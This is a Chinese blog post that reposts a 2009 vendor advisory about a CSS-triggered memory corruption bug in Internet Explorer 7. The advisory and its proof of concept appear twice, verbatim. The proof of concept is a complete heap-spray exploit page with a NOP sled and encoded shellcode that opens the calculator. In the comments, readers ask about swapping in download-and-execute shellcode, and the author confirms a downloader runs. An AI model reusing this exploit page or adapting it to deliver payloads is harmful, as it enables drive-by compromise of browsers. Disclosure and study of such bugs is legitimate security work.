上一篇
下一篇
南京铱迅发现微软IE7.0 异常CSS导致内存破坏漏洞
作者:friddy 日期:2009-11-20
详情请关注
http://www.yxlink.com/newsview_15.html
[Copy From yxlink.com]
+++++++++++++++++++++++++++++++++++++++++++++++++
1.漏洞介绍
在XHTML 1.0标准下,使用特殊构造的CSS样式,在Internet Explorer 7.0 打开特定的网页后,Internet Explorer 7.0将发生内存崩溃,EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码,就可以执行任意命令。
2.漏洞危害(危害等级高)
黑客如果将含有“漏洞利用程序的网页”置于网站上,浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。
3.通知途径
已经向“国家漏洞库”提交。
4.详细文档下载: [url]http://www.yxlink.com/download/[YV20090432]IE7vul.doc[/url]
POC:
<!--
请将以下内容粘贴到html文件中,成功后将跳出计算器程序
南京铱迅信息技术有限公司(Nanjing Yxlink Information Technologies Co.,Ltd.)
http://www.yxlink.com
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
</HEAD>
<BODY onload="load()">
</BODY>
</HTML>
http://www.yxlink.com/newsview_15.html
[Copy From yxlink.com]
+++++++++++++++++++++++++++++++++++++++++++++++++
1.漏洞介绍
在XHTML 1.0标准下,使用特殊构造的CSS样式,在Internet Explorer 7.0 打开特定的网页后,Internet Explorer 7.0将发生内存崩溃,EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码,就可以执行任意命令。
2.漏洞危害(危害等级高)
黑客如果将含有“漏洞利用程序的网页”置于网站上,浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。
3.通知途径
已经向“国家漏洞库”提交。
4.详细文档下载: [url]http://www.yxlink.com/download/[YV20090432]IE7vul.doc[/url]
POC:
<!--
请将以下内容粘贴到html文件中,成功后将跳出计算器程序
南京铱迅信息技术有限公司(Nanjing Yxlink Information Technologies Co.,Ltd.)
http://www.yxlink.com
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
</HEAD>
<BODY onload="load()">
</BODY>
</HTML>
文章来自: 
引用通告: 
Tags: 评论: 4 | 引用: 0 | 查看次数: 1671
回复
ho[2009-11-24 03:44 PM | 
]是用的什么环境测试?
是只可以执行downloader还是可以替换成down&exec ,至少后者我替换后也是没执行
2G要求太高了,放弃了,顶大牛
这个能弹出来计算器,但是好像替换成down&exec shellcode ,却不能执行,不知道是什么原因
friddy 回复
friddy 回复可以执行downloader
发表评论
